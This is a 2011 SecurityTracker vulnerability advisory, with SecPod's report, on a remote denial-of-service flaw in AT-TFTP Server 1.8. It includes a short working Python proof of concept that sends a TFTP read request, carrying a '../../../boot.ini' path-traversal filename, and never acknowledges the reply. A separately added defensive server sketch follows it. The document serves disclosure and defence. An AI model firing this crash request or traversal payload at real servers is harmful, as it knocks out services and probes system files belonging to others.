SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   AT-TFTP Server
Vendors:   Allied Telesyn International
AT-TFTP Server Protocol Error Lets Remote Users Deny Service
SecurityTracker Alert ID:  1025437
SecurityTracker URL:  http://securitytracker.com/id/1025437
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 25 2011
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.8
Description:   A vulnerability was reported in AT-TFTP Server. A remote user can cause denial of service conditions.

A remote user can withhold the acknowledgement response to the server after a successful read operation, causing the target 'TFTPD.EXE' service to crash.

The vendor was notified on April 4, 2011.

Antu Sanadi of SecPod Technologies reported this vulnerability.

Impact:   A remote user can cause denial of service conditions on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.alliedtelesis.eu/
Cause:   State error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Mon, 25 Apr 2011 15:31:19 +0530
Subject:  AT-TFTP Server Remote Denial of Service Vulnerability

Hi,

SecPod Research Team Member Antu Sanadi has found a DoS
Vulnerability in AT-TFTP Server.

Advisory and POC details have been attached to this mail.


Regards,
SecPod Research Team
http://www.secpod.com

Content-disposition: attachment; filename=SecPod_AT_TFTP_DoS.txt

###############################################################################
AT-TFTP Server v1.8 Remote Denial of Service  Vulnerability

SecPod Technologies (www.secpod.com)
Author: Antu Sanadi
###############################################################################

SecPod ID: 1013					01/04/2011 Issue Discovered
						04/04/2011 Vendor Notified
						No Response from the Vendor
						25/04/2011 Advisory Released
					       

Class: Denial of Service			Severity: High


Overview:
---------
AT-TFTP Server v1.8 is prone to a remote Denial of Service vulnerability
as it fails to handle 'read' requests from the client properly.


Technical Description:
----------------------
The vulnerability is caused by an error in the "TFTPD.EXE" which causes the
server to crash when no acknowledgement response is sent back to the server
after a successful 'read'.


Impact:
--------
Successful exploitation could allow an attacker to crash a vulnerable server.


Affected Software:
------------------
AT-TFTP Server version 1.8

Tested on,
AT-TFTP Server version 1.8 on Windows XP SP3


References:
-----------
http://secpod.org/blog/?p=194
http://www.alliedtelesis.co.nz/
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt


Proof of Concept:
----------------
http://secpod.org/blog/?p=194
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py


Solution:
----------
Not available


Risk Factor:
-------------
    CVSS Score Report: 
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = COMPLETE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)


Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.

Content-disposition: attachment; filename=SecPod_AT_TFTP_DoS-POC.py

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference : 
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

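try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except socket.error:
	print("socket() failed")
	sys.exit(1)

addr = (host, port)

# TFTP read request (RRQ): opcode 0x0001, filename "../../../boot.ini",
# NUL, mode "netascii", NUL.
data = b'\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' + \
       b'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
# The request is sent and the script exits without ever acknowledging
# the server's reply.
s.sendto(data, addr)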
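
Added example, not part of the SecPod advisory or the vendor's code: a sketch of how a TFTP server's read path can tolerate the condition described under "Technical Description", a client that never acknowledges a DATA block. The names ReadTransfer and serve_silent_client and the retry budget are assumptions for illustration; resolving the requested filename to a file is out of scope here.

```python
import struct

OP_RRQ, OP_DATA, OP_ACK = 1, 3, 4    # RFC 1350 opcodes
BLOCK_SIZE, MAX_RETRIES = 512, 3     # retry budget of 3 is an assumption
# Constructed sample: the read request bytes from the PoC above.
SAMPLE_RRQ = b"\x00\x01../../../boot.ini\x00netascii\x00"

def parse_rrq(packet):
    """Return (filename, mode) for a well-formed RRQ, otherwise None."""
    fields = packet[2:].split(b"\x00")
    if packet[:2] != struct.pack("!H", OP_RRQ) or len(fields) < 3 or not all(fields[:2]):
        return None
    return fields[0].decode("latin-1"), fields[1].decode("latin-1").lower()

class ReadTransfer:
    """Hypothetical per-session state; the caller owns the socket and the timer."""
    def __init__(self, payload):
        self.payload, self.block, self.retries, self.state = payload, 1, 0, "WAIT_ACK"
    def data_packet(self):
        chunk = self.payload[(self.block - 1) * BLOCK_SIZE:self.block * BLOCK_SIZE]
        return struct.pack("!HH", OP_DATA, self.block & 0xFFFF) + chunk
    def on_ack(self, packet):
        """Advance on the expected ACK; ignore malformed or stale ones."""
        expected = struct.pack("!HH", OP_ACK, self.block & 0xFFFF)
        if self.state != "WAIT_ACK" or packet != expected:
            return None
        if len(self.data_packet()) - 4 < BLOCK_SIZE:   # short block ended the file
            self.state = "DONE"
            return None
        self.block, self.retries = self.block + 1, 0
        return self.data_packet()
    def on_timeout(self):
        """No ACK arrived: retransmit a bounded number of times, then abort."""
        if self.state != "WAIT_ACK":
            return None
        if self.retries >= MAX_RETRIES:
            self.state = "ABORTED"   # drop this session only; the listener keeps running
            return None
        self.retries += 1
        return self.data_packet()

def serve_silent_client(request, payload):
    """Handle an RRQ whose sender never ACKs; return (final state, datagrams sent)."""
    if parse_rrq(request) is None:
        return "REJECTED", 0
    transfer, sent = ReadTransfer(payload), 1   # 1 = the initial DATA block
    while transfer.state == "WAIT_ACK":
        sent += transfer.on_timeout() is not None
    return transfer.state, sent
```

With the silent client from the PoC, the session ends in the ABORTED state after the initial block and three retransmissions, and only that session's state is discarded.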
